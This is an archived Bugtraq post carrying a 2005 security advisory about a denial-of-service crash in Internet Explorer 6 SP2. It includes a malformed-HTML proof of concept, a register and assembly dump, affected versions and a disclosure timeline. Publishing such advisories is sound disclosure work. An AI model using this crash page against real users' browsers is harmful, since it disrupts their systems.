Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2

from [bugtraq] Network Security [Permanent Link]
Subject: [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2
Date: 24 Dec 2005 23:44:01 -0000 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ---------------------------------------------------
| BuHa Security-Advisory #5     |    Dec 24th, 2005 |
 ---------------------------------------------------
| Vendor   | M$ Internet Explorer 6.0               |
| URL      | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2              |
| Risk     | Low (DoS - Null Read Dereference)      |
 ---------------------------------------------------
 
o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d6c74b1
===================

Following HTML code forces M$ IE 6 to crash:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
</samp></colgroup><ul><font><menu> <code> <var>
<sub><h2></fieldset>
</kbd></frameset>
</ins></map></noframes>
</isindex>
</code>
</div></title>
</del></var><isindex>
<i>


Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900490843-7d6c74b1.html

These are the register values and the ASM dump at the time of the access
violation:
eax=0129040a ebx=0129ef30 ecx=00000001 edx=012945f0 esi=00000000
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000  efl=00000246

        7d6c748b 6a0b             push    0xb
        7d6c748d 33c0             xor     eax,eax
        7d6c748f 59               pop     ecx
        7d6c7490 8bfe             mov     edi,esi
        7d6c7492 f3ab             rep     stosd
        7d6c7494 8b45f8           mov     eax,[ebp-0x8]
        7d6c7497 8906             mov     [esi],eax
        7d6c7499 897228           mov     [edx+0x28],esi
        7d6c749c e9af010000       jmp     mshtml+0x217650 (7d6c7650)
        7d6c74a1 8b4728           mov     eax,[edi+0x28]
        7d6c74a4 8b7028           mov     esi,[eax+0x28]
        7d6c74a7 897728           mov     [edi+0x28],esi
        7d6c74aa 8b4320           mov     eax,[ebx+0x20]
        7d6c74ad 668b4002         mov     ax,[eax+0x2]
FAULT ->7d6c74b1 8b4e24           mov     ecx,[esi+0x24]
                                          ds:0023:00000024=????????
        7d6c74b4 66250030         and     ax,0x3000
        7d6c74b8 662d0010         sub     ax,0x1000
        7d6c74bc 66f7d8           neg     ax
        7d6c74bf 897510           mov     [ebp+0x10],esi
        7d6c74c2 1bc0             sbb     eax,eax
        7d6c74c4 40               inc     eax
        7d6c74c5 50               push    eax
        7d6c74c6 e80c8efeff       call    mshtml+0x2002d7 (7d6b02d7)
        7d6c74cb 0fb6c0           movzx   eax,al
        7d6c74ce 48               dec     eax
        7d6c74cf 83f80c           cmp     eax,0xc
        7d6c74d2 0f877b010000     jnbe    mshtml+0x217653 (7d6c7653)
        7d6c74d8 ff2485c7796c7d   jmp     dword ptr [mshtml+0x2179c7
                                          (7d6c79c7)+eax*4]
        7d6c74df 8b4e20           mov     ecx,[esi+0x20]
        7d6c74e2 f6410208         test    byte ptr [ecx+0x2],0x8
        7d6c74e6 7419             jz      mshtml+0x217501 (7d6c7501)
        7d6c74e8 8b45fc           mov     eax,[ebp-0x4]
        7d6c74eb ff7014           push    dword ptr [eax+0x14]
        7d6c74ee 8b4610           mov     eax,[esi+0x10]
        7d6c74f1 03460c           add     eax,[esi+0xc]
        7d6c74f4 50               push    eax
        7d6c74f5 e899ba0100       call    mshtml+0x232f93 (7d6e2f93)

It appears to be a null read dereference crash which is not exploitable.


o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:

M$ IE 6 SP2 - Win XP Pro SP2
M$ IE 6     - Win 2k SP4



o Disclosure Timeline:
=====================

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
20 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==========

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=========

Christian Deneke <bugtraq@deneke.biz>

- --

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-2.txt 

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFDrdsUkCo6/ctnOpYRAuyKAKCs+kRe0D9LEpRSaBV8skBLrIWzPACfS4mU
07WulbyPImV5j9zbwi56gOo=
=JX5G
-----END PGP SIGNATURE-----
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2, bugtraq <=
Previous by Date:  Found new bug, hackeriri
Next by Date:  [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3, bugtraq
Previous by Thread:  Found new bug, hackeriri
Next by Thread:  [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3, bugtraq
Indexes:  [Date] [Thread] [Top] [All Lists]